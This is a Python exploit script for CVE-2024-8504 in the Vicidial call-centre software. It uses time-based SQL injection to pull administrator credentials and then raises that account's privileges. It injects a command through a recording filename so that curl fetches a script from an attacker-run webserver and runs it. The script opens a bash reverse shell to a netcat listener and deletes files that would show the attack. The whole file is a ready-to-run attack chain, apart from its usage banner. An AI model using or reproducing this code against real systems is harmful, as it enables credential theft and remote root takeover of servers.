import os import re import socket import string import random import urllib3 import argparse import requests import threading import rich_click as click from faker import Faker from base64 import b64encode from datetime import datetime from bs4 import BeautifulSoup from urllib.parse import urlparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class Exploit: def __init__( self, url, whost, wport, lhost=None, lport=None, bind=False, proxy=None ): """ This 'sleep' duration is derived by the average response time multiplied by this value. A server with an average response time of 10ms is given a 'sleep' duration of 300ms. Tune as needed. """ self.SLEEP_MULTIPLIER = 4 self.fake = Faker() self.REQUEST_HEADERS = {"User-Agent": self.fake.user_agent()} self.ALLOWED_SCHEMES = ["http", "https"] if proxy: self.REQUEST_PROXIES = {"http": proxy, "https": proxy} else: self.REQUEST_PROXIES = {} self.TARGET_URL = url # Resolve the domain to IP and replace in the URL self.replace_domain_with_ip() # Get the IP from the resolved URL self.TARGET_IP = urlparse(self.TARGET_URL).hostname self.PAYLOAD_WEBSERVER_HOST = whost self.PAYLOAD_WEBSERVER_PORT = wport self.REVERSE_SHELL_HOST = lhost self.REVERSE_SHELL_PORT = lport self.BIND = bind self.VICIDIAL_FINGERPRINT = "Please Hold while I redirect you!" self.RANDOM_CHARSET = string.ascii_uppercase + string.digits self.CAMPAIGN_ID = "".join(random.choices(string.digits, k=6)) self.LIST_ID = str(int(self.CAMPAIGN_ID) + 1) self.MALICIOUS_FILENAME = "." + "".join( random.choices(string.ascii_lowercase + string.digits, k=4) ) self.COMPANY_NAME = ( self.fake.company().title() + " " + random.choice( [ "Dial", "Inbound", "Call", "Shift", "Support", "Sales", "Outbound", "Admin", "Helpdesk", "Queue", "Agent", "Service", "Tech", "Monitoring", "Operations", "Logistics", "Manager", ] ) ) def custom_print(self, message: str, header: str) -> None: """ Prints a message with a colored header to indicate the message type. """ header_colors = { "+": "green", "-": "red", "!": "yellow", "*": "blue", "~": "magenta", } header_color = header_colors.get(header, "white") formatted_message = click.style( f"[{header}] ", fg=header_color, bold=True ) + click.style(f"{message}", bold=True, fg="white") click.echo(formatted_message) # returns a session object with custom proxies/headers if supplied def build_requests_session(self): session = requests.Session() session.proxies = self.REQUEST_PROXIES session.verify = False return session # returns a random string of a given length def random(self, length): return "".join(random.choice(self.RANDOM_CHARSET) for _ in range(length)) # returns a timedelta representing the response time of an injected SQL query def time_sql_query(self, query, session): username = f"goolicker', '', ({query}));# " credentials = f"{username}:password" credentials_base64 = b64encode(credentials.encode()).decode() auth_header = f"Basic {credentials_base64}" target_uri = f"{self.TARGET_URL}/VERM/VERM_AJAX_functions.php" request_params = { "function": "log_custom_report", self.random(5): self.random(5), } request_headers = {**self.REQUEST_HEADERS, "Authorization": auth_header} response = session.get( target_uri, params=request_params, headers=request_headers ) return response.elapsed # returns a boolean if time-based SQL injection is possible, additionally # sets the best 'sleep' duration based on response times def is_vulnerable(self, session, baseline_iterations=5): # determine average baseline response time zero_sleep_query = f"SELECT (NULL)" total_baseline_time = 0 for _ in range(baseline_iterations): execution_time = self.time_sql_query(zero_sleep_query, session) total_baseline_time += execution_time.total_seconds() average_baseline_response_time = total_baseline_time / baseline_iterations self.sql_baseline_time = average_baseline_response_time # determine if injected sleep query impacts response time sleep_length = round(average_baseline_response_time * self.SLEEP_MULTIPLIER, 2) sleep_query = f"SELECT (sleep({sleep_length}))" execution_time = self.time_sql_query(sleep_query, session) if execution_time.total_seconds() >= sleep_length: self.sql_sleep_length = sleep_length return True else: return False # determine if a character at a specific indice of a query result returns a # boolean 'true' when compared to a given character using the supplied operator def check_indice_of_query_result(self, session, query, indice, operator, ordinal): parent_query = f"SELECT IF(ORD((SUBSTRING(({query}), {indice}, {indice}))){operator}{ordinal}, sleep({self.sql_sleep_length}), null)" execution_time = self.time_sql_query(parent_query, session) return execution_time.total_seconds() >= ( self.sql_baseline_time * self.SLEEP_MULTIPLIER ) def enumerate_sql_query( self, session, query="SELECT @@version", charset=string.printable ): # convert charset to ordinals all_characters = sorted([ord(char) for char in charset]) reduced_characters = all_characters # use a binary search and enumerate query results result = "" indice = 1 indice_could_be_null = True while True: """ we check if the value is NULL once per indice to determine when a string ends. this adds one request per indice, but since every boolean 'true' results in a delay this is faster than counting the length of the string before enumrating. """ if indice_could_be_null: if self.check_indice_of_query_result(session, query, indice, "=", "0"): break else: indice_could_be_null = False # enumerate each character of query result with a binary search middle_indice = len(reduced_characters) // 2 middle_ordinal = reduced_characters[middle_indice] if self.check_indice_of_query_result( session, query, indice, "<=", middle_ordinal ): if self.check_indice_of_query_result( session, query, indice, "=", middle_ordinal ): reduced_characters = all_characters result += chr(middle_ordinal) indice += 1 indice_could_be_null = True self.custom_print(result, "*") else: reduced_characters = reduced_characters[:middle_indice] else: reduced_characters = reduced_characters[middle_indice:] return result def get_dynamic_fields(self, session, username, password): # Creates the POST request body to retrieve dynamic fields vdc_db_query_body = { "user": username, "pass": password, "ACTION": "LogiNCamPaigns", "format": "html", } try: # Sends the POST request to /agc/vdc_db_query.php response = session.post( f"{self.TARGET_URL}/agc/vdc_db_query.php", data=vdc_db_query_body ) if not response or response.status_code != 200: self.custom_print("Failed to retrieve hidden input fields", "-") return None, None # Parses the HTML response to retrieve the hidden input fields soup = BeautifulSoup(response.text, "html.parser") mgr_login_name = soup.find("input", {"name": re.compile(r"^MGR_login")}) mgr_pass_name = soup.find("input", {"name": re.compile(r"^MGR_pass")}) # Ensure both fields are retrieved if not mgr_login_name or not mgr_pass_name: self.custom_print( "Could not find the required dynamic fields, constructing manually", "!", ) # Get today's date in the required format (YYYYMMDD) today_date = datetime.now().strftime("%Y%m%d") # Manually construct the dynamic field names mgr_login_name = f"MGR_login{today_date}" mgr_pass_name = f"MGR_pass{today_date}" self.custom_print( f"Manually constructed dynamic field names: {mgr_login_name}, {mgr_pass_name}", "+", ) else: mgr_login_name = mgr_login_name["name"] mgr_pass_name = mgr_pass_name["name"] self.custom_print( f"Retrieved dynamic field names: {mgr_login_name}, {mgr_pass_name}", "+", ) return mgr_login_name, mgr_pass_name except Exception as e: self.custom_print(f"An error occurred: {str(e)}", "-") return None, None def resolve_domain_to_ip(self, url): """Resolves a domain name to an IP address""" try: parsed_url = urlparse(url) domain = parsed_url.hostname if re.match(r"\d+\.\d+\.\d+\.\d+", domain): return domain ip_address = socket.gethostbyname(domain) return ip_address except socket.gaierror as e: raise ValueError(f"Error resolving domain: {str(e)}") def replace_domain_with_ip(self): """Replaces the domain in the TARGET_URL with its resolved IP address""" ip_address = self.resolve_domain_to_ip(self.TARGET_URL) self.TARGET_URL = self.TARGET_URL.replace( urlparse(self.TARGET_URL).hostname, ip_address ) def poison_recording_files(self, session, username, password): try: # authenticate using administrator credentials credentials = f"{username}:{password}" credentials_base64 = b64encode(credentials.encode()).decode() auth_header = f"Basic {credentials_base64}" target_uri = f"{self.TARGET_URL}/vicidial/admin.php" request_params = {"ADD": "3", "user": username} request_headers = {**self.REQUEST_HEADERS, "Authorization": auth_header} response = session.get( target_uri, params=request_params, headers=request_headers ) if response.status_code == 200: self.custom_print( f'Authenticated successfully as user "{username}"', "+" ) else: self.custom_print( "Failed to authenticate with credentials. Maybe hashing is enabled?", "-", ) return False # update user settings to increase privileges beyond default administrator user_settings_body = { "ADD": "4A", "user": username, "DB": "0", "pass": password, "force_change_password": "N", "full_name": self.fake.name(), "user_level": "9", "user_group": "ADMIN", "phone_login": self.fake.user_name(), "phone_pass": self.fake.password(), "active": "Y", "user_new_lead_limit": "-1", "agent_choose_ingroups": "1", "agent_choose_blended": "1", "scheduled_callbacks": "1", "vicidial_recording": "1", "vicidial_transfers": "1", "selected_language": "default+English", "agent_shift_enforcement_override": "ALL", "agent_call_log_view_override": "Y", "hide_call_log_info": "Y", "lead_filter_id": "NONE", "max_inbound_filter_min_sec": "-1", "inbound_credits": "-1", "wrapup_seconds_override": "-1", "ready_max_logout": "-1", "GRADE_AGENTDIRECT": "10", "LIMIT_AGENTDIRECT": "-1", "GRADE_AGENTDIRECT_CHAT": "10", "LIMIT_AGENTDIRECT_CHAT": "-1", "qc_user_level": "1", "view_reports": "1", "alter_agent_interface_options": "1", "modify_users": "1", "change_agent_campaign": "1", "delete_users": "1", "modify_usergroups": "1", "delete_user_groups": "1", "modify_lists": "1", "delete_lists": "1", "load_leads": "1", "modify_leads": "1", "download_lists": "1", "export_reports": "1", "delete_from_dnc": "1", "modify_campaigns": "1", "campaign_detail": "1", "modify_dial_prefix": "1", "delete_campaigns": "1", "modify_ingroups": "1", "delete_ingroups": "1", "modify_inbound_dids": "1", "delete_inbound_dids": "1", "modify_custom_dialplans": "1", "modify_remoteagents": "1", "delete_remote_agents": "1", "modify_scripts": "1", "delete_scripts": "1", "modify_filters": "1", "delete_filters": "1", "ast_admin_access": "1", "ast_delete_phones": "1", "modify_call_times": "1", "delete_call_times": "1", "modify_servers": "1", "modify_shifts": "1", "modify_phones": "1", "modify_carriers": "1", "modify_labels": "1", "modify_colors": "1", "modify_statuses": "1", "modify_voicemail": "1", "modify_audiostore": "1", "modify_moh": "1", "modify_tts": "1", "modify_contacts": "1", "callcard_admin": "1", "add_timeclock_log": "1", "modify_timeclock_log": "1", "delete_timeclock_log": "1", "manager_shift_enforcement_override": "1", "pause_code_approval": "1", "vdc_agent_api_access": "1", "api_allowed_functions%5B%5D": "ALL_FUNCTIONS", "modify_same_user_level": "1", "download_invalid_files": "1", "alter_admin_interface_options": "1", "SUBMIT": "SUBMIT", } response = session.post( target_uri, headers=request_headers, data=user_settings_body ) self.custom_print("Updated user settings to increase privileges", "+") # update system settings without clobbering existing configuration response = session.get( target_uri, headers=request_headers, params={"ADD": "311111111111111"} ) soup = BeautifulSoup(response.text, "html.parser") form_tag = soup.find("form") system_settings_body = {} for input_tag in form_tag.find_all("input"): setting_name = input_tag["name"] setting_value = input_tag["value"] system_settings_body[setting_name] = setting_value for select_tag in form_tag.find_all("select"): setting_name = select_tag["name"] selected_tag = select_tag.find("option", selected=True) if not selected_tag: continue setting_value = selected_tag.text system_settings_body[setting_name] = setting_value system_settings_body["outbound_autodial_active"] = "0" response = session.post( target_uri, headers=request_headers, data=system_settings_body ) self.custom_print("Updated system settings", "+") # create dummy campaign campaign_settings_body = { "ADD": "21", "campaign_id": self.CAMPAIGN_ID, "campaign_name": f"{self.COMPANY_NAME}", "user_group": "---ALL---", "active": "Y", "allow_closers": "Y", "hopper_level": "1", "next_agent_call": "random", "local_call_time": "12am-11pm", "get_call_launch": "NONE", "SUBMIT": "SUBMIT", } response = session.post( target_uri, headers=request_headers, data=campaign_settings_body ) self.custom_print(f'Created dummy campaign "{self.COMPANY_NAME}"', "+") # update dummy campaign update_campaign_body = { "ADD": "41", "campaign_id": self.CAMPAIGN_ID, "old_campaign_allow_inbound": "Y", "campaign_name": f"{self.COMPANY_NAME}", "active": "Y", "lead_order": "DOWN", "lead_filter_id": "NONE", "no_hopper_leads_logins": "Y", "hopper_level": "1", "reset_hopper": "N", "dial_method": "RATIO", "auto_dial_level": "1", "SUBMIT": "SUBMIT", "form_end": "END", } response = session.post( target_uri, headers=request_headers, data=update_campaign_body ) self.custom_print("Updated dummy campaign settings", "+") # create dummy list list_settings_body = { "ADD": "211", "list_id": self.LIST_ID, "list_name": f"{self.COMPANY_NAME}_list", "campaign_id": self.CAMPAIGN_ID, "active": "Y", "SUBMIT": "SUBMIT", } response = session.post( target_uri, headers=request_headers, data=list_settings_body ) self.custom_print("Created dummy list for campaign", "+") # fetch credentials for a phone login try: response = session.get( target_uri, headers=request_headers, params={"ADD": "10000000000"} ) phone_uri_path = BeautifulSoup(response.text, "html.parser").find( "a", string="MODIFY" )["href"] response = session.get( f"{self.TARGET_URL}{phone_uri_path}", headers=request_headers ) soup = BeautifulSoup(response.text, "html.parser") phone_extension = soup.find("input", {"name": "extension"})["value"] phone_password = soup.find("input", {"name": "pass"})["value"] recording_extension = soup.find("input", {"name": "recording_exten"})[ "value" ] self.custom_print( f"Found phone credentials: {phone_extension}:{phone_password}", "+" ) except Exception as e: self.custom_print(f"Error retrieving phone credentials: {str(e)}", "-") return False # authenticate to agent portal with phone credentials mgr_login_name, mgr_pass_name = self.get_dynamic_fields( session, username, password ) if not all([mgr_login_name, mgr_pass_name]): return False # authenticate to agent portal with phone credentials manager_login_body = { "DB": "0", "JS_browser_height": "1313", "JS_browser_width": "2560", "phone_login": phone_extension, "phone_pass": phone_password, "VD_login": username, "VD_pass": password, "MGR_override": "1", "relogin": "YES", "VD_login": username, "VD_pass": password, mgr_login_name: username, mgr_pass_name: password, "SUBMIT": "SUBMIT", } response = session.post( f"{self.TARGET_URL}/agc/vicidial.php", headers=request_headers, data=manager_login_body, ) self.custom_print( f'Entered "manager" credentials to override shift enforcement', "+" ) agent_login_body = { "DB": "0", "JS_browser_height": "1313", "JS_browser_width": "2560", "phone_login": phone_extension, "phone_pass": phone_password, "VD_login": username, "VD_pass": password, "VD_campaign": self.CAMPAIGN_ID, } response = session.post( f"{self.TARGET_URL}/agc/vicidial.php", headers=request_headers, data=agent_login_body, ) self.custom_print(f"Authenticated as agent using phone credentials", "+") try: malicious_filename = f"$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS{self.MALICIOUS_FILENAME}&&bash$IFS{self.MALICIOUS_FILENAME})" session_name = re.findall( r"var session_name = '([a-zA-Z0-9_]+?)';", response.text )[0] session_id = re.findall( r"var session_id = '([0-9]+?)';", response.text )[0] self.custom_print( f"Session Name: {session_name}, Session ID: {session_id}", "+" ) except Exception as e: self.custom_print( f"Error retrieving session_name or session_id: {str(e)}", "-" ) return False record1_body = { "server_ip": self.TARGET_IP, "session_name": session_name, "user": username, "pass": password, "ACTION": "MonitorConf", "format": "text", "channel": f"Local/{recording_extension}@default", "filename": malicious_filename, "exten": recording_extension, "ext_context": "default", "ext_priority": "1", "FROMvdc": "YES", } try: response = session.post( f"{self.TARGET_URL}/agc/manager_send.php", headers=request_headers, data=record1_body, ) recording_id_match = re.findall( r"RecorDing_ID: ([0-9]+)", response.text ) if not recording_id_match: raise ValueError( "Failed to retrieve RecorDing_ID from the response." ) recording_id = recording_id_match[0] self.custom_print( f"Recording ID: {recording_id} retrieved successfully", "+" ) self.custom_print(response.text, "~") except Exception as e: self.custom_print(f"Error retrieving RecorDing_ID: {str(e)}", "-") return False # stop malicious recording to prevent file size from growing record2_body = { "server_ip": self.TARGET_IP, "session_name": session_name, "user": username, "pass": password, "ACTION": "StopMonitorConf", "format": "text", "channel": f"Local/{recording_extension}@default", "filename": f"ID:{recording_id}", "exten": session_id, "ext_context": "default", "ext_priority": "1", "FROMvdc": "YES", } response = session.post( f"{self.TARGET_URL}/agc/conf_exten_check.php", headers=request_headers, data=record2_body, ) return True except Exception as e: self.custom_print(f"An error occurred during exploitation: {str(e)}", "-") finally: # Always delete the campaign, regardless of success or failure self.custom_print( f"Deleting campaign '{self.COMPANY_NAME}' with ID {self.CAMPAIGN_ID}", "*", ) try: session.get( f"{self.TARGET_URL}/vicidial/admin.php?ADD=61&campaign_id={self.CAMPAIGN_ID}&CoNfIrM=YES", headers=request_headers, ) self.custom_print("Campaign deleted successfully.", "+") except Exception as delete_exception: self.custom_print( f"Failed to delete campaign: {str(delete_exception)}", "-" ) # returns administrator username and password by # exploiting time-based SQL injection. def extract_admin_credentials(self, session): self.custom_print("Enumerating administrator credentials", "*") username_charset = string.ascii_letters + string.digits admin_username_query = "SELECT user FROM vicidial_users WHERE user_level = 9 AND modify_same_user_level = '1' LIMIT 1" admin_username = self.enumerate_sql_query( session, admin_username_query, username_charset ) self.custom_print(f"Username: {admin_username}", "+") password_charset = string.ascii_letters + string.digits + "-.+/=_" admin_password_query = ( f"SELECT pass FROM vicidial_users WHERE user = '{admin_username}' LIMIT 1" ) admin_password = self.enumerate_sql_query( session, admin_password_query, password_charset ) self.custom_print(f"Password: {admin_password}", "+") return admin_username, admin_password # emulates a webserver to deliver exploit script # Webserver function that closes once contacted def payload_webserver(self): try: server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((self.PAYLOAD_WEBSERVER_HOST, int(self.PAYLOAD_WEBSERVER_PORT))) server.listen(1) self.custom_print( f"Webserver started at {self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}", "*", ) client, incoming_address = server.accept() message = client.recv(100) if b"User-Agent: curl" in message: self.custom_print( f"Received cURL request from {incoming_address[0]}", "+" ) exploit_script = ( f"#!/bin/bash\n" f"rm {self.MALICIOUS_FILENAME} /var/spool/asterisk/monitor/*curl*\n" f"bash -i >& /dev/tcp/{self.REVERSE_SHELL_HOST}/{self.REVERSE_SHELL_PORT} 0>&1\n" ) http_response = f"HTTP/1.1 200 OK\r\n" http_response += f"Content-Length: {len(exploit_script)}\r\n\r\n" http_response += exploit_script client.sendall(http_response.encode()) client.close() server.close() except Exception as e: self.custom_print(f"Error in webserver: {str(e)}", "-") def start_listener(self): try: self.custom_print( f"Starting Netcat listener on port {self.REVERSE_SHELL_PORT}", "*" ) os.system(f"nc -lvnp {self.REVERSE_SHELL_PORT}") except Exception as e: self.custom_print(f"Error while starting Netcat listener: {str(e)}", "-") # Binds to provided addresses and handles incoming connections def prepare_listeners(self): try: webserver = threading.Thread(target=self.payload_webserver) listener = threading.Thread(target=self.start_listener) self.custom_print("Listening for incoming connections...", "*") webserver.start() listener.start() listener.join() webserver.join() except Exception as e: self.custom_print(f"Error while setting up listeners: {str(e)}", "-") def perform_sqli(self): session = self.build_requests_session() is_vulnerable = self.is_vulnerable(session) if is_vulnerable: self.custom_print( "Target appears vulnerable to time-based SQL injection", "+" ) else: self.custom_print("Failed to perform time-based SQL injection", "-") return None, None username, password = self.extract_admin_credentials(session) return username, password def print_banner(): banner = """ ============================================= | EXPLOIT CVE-2024-8504 | | Unauthenticated SQLi to RCE Exploit | | Found by: KoreLogic | | Modded by: Chocapikk | ============================================= SQLi Command: python exploit.py -u https://example.org RCE Command (Authenticated): python exploit.py -b -u https://example.org \\ -wh -wp \\ -lh -lp \\ -un -pw ============================================= """ click.echo(click.style(banner, fg="cyan", bold=True)) if __name__ == "__main__": print_banner() argparser = argparse.ArgumentParser( description="Exploit for CVE-2024-8504: Unauthenticated SQLi to retrieve credentials or RCE as root" ) required = argparser.add_argument_group("Required Arguments") optional = argparser.add_argument_group("Optional Arguments") required.add_argument( "-u", "--url", required=True, help="Vicidial Server URL (e.g., https://example.com:443)", ) optional.add_argument( "-wh", "--whost", required=False, help="Malicious webserver IP address" ) optional.add_argument( "-wp", "--wport", required=False, help="Malicious webserver port number" ) optional.add_argument( "-lh", "--lhost", required=False, help="Reverse shell listener IP address" ) optional.add_argument( "-lp", "--lport", required=False, help="Reverse shell listener port number" ) optional.add_argument( "-un", "--username", required=False, help="Vicidial admin username if already known", ) optional.add_argument( "-pw", "--password", required=False, help="Vicidial admin password if already known", ) optional.add_argument( "-b", "--bind", required=False, help="Bind to [lhost:lport] and [whost:wport] and handle connections automatically", action="store_true", default=False, ) optional.add_argument( "-p", "--proxy", required=False, help="HTTP[S] proxy to use for outbound requests", default=None, ) arguments = argparser.parse_args() if arguments.bind and (not arguments.whost or not arguments.wport): print("Error: --whost and --wport are required when using --bind.") exit(1) exploit = Exploit( url=arguments.url, whost=arguments.whost, wport=arguments.wport, lhost=arguments.lhost, lport=arguments.lport, bind=arguments.bind, proxy=arguments.proxy, ) session = exploit.build_requests_session() if arguments.username and arguments.password: exploit.custom_print("Using provided credentials for exploitation...", "*") exploited = exploit.poison_recording_files( session, arguments.username, arguments.password ) if arguments.bind and exploited: exploit.prepare_listeners() else: exploit.custom_print( "Attempting SQLi exploitation to retrieve credentials...", "*" ) username, password = exploit.perform_sqli() if username and password: exploit.custom_print( f"SQLi successful: Username: {username}, Password: {password}", "+" ) else: exploit.custom_print("SQLi failed, no credentials retrieved.", "-")